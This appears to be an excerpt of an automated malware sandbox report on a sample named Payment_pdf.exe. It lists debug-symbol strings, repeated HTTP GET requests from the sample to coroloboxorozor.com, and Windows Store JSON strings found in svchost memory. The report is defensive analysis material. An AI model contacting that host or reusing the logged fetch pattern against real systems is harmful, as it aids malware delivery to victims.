                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: o.pdb)X source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: msasn1.pdb[ source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.ni.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: System.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: nsi.pdbxj source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdbF source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: C:\Users\user\Desktop\Payment_pdf.PDB source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: psapi.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Payment_pdf.exe, 00000000.00000002.408285568.0000000000A2D000.00000004.00000020.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: bcrypt.pdbv source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: combase.pdbk source: WerFault.exe, 0000000F.00000003.432423021.0000000004C84000.00000004.00000040.sdmp
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000F.00000003.432580092.0000000004AC6000.00000004.00000001.sdmp
                  Source: Binary string: powrprof.pdb` source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: edputil.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1Host: coroloboxorozor.com
                  Source: Joe Sandbox ViewIP Address: 172.67.172.17 172.67.172.17
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/A632564F6B586F5A6F356DB5CA3B2690.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base/81C3FE323C5502E2AE417434B3B29FF7.html HTTP/1.1Host: coroloboxorozor.com
                  Source: global trafficHTTP traffic detected: GET /base/4E6D09D3FE7F5C729D5893BBC810E319.html HTTP/1.1Host: coroloboxorozor.com
                  Source: svchost.exe, 0000001B.00000002.511486815.0000025027D13000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE4 equals www.facebook.com (Facebook)
                  Source: svchost.exe, 0000001B.00000002.511486815.0000025027D13000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE4 equals www.twitter.com (Twitter)
                  Source: svchost.exe, 0000001B.00000003.481513610.0000025027D63000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                  Source: svchost.exe, 0000001B.00000003.481513610.0000025027D63000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                  Source: svchost.exe, 0000001B.00000003.481513610.0000025027D63000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                  Source: svchost.exe, 0000001B.00000003.481630694.0000025027D85000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                  Source: svchost.exe, 0000001B.00000003.481630694.0000025027D85000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
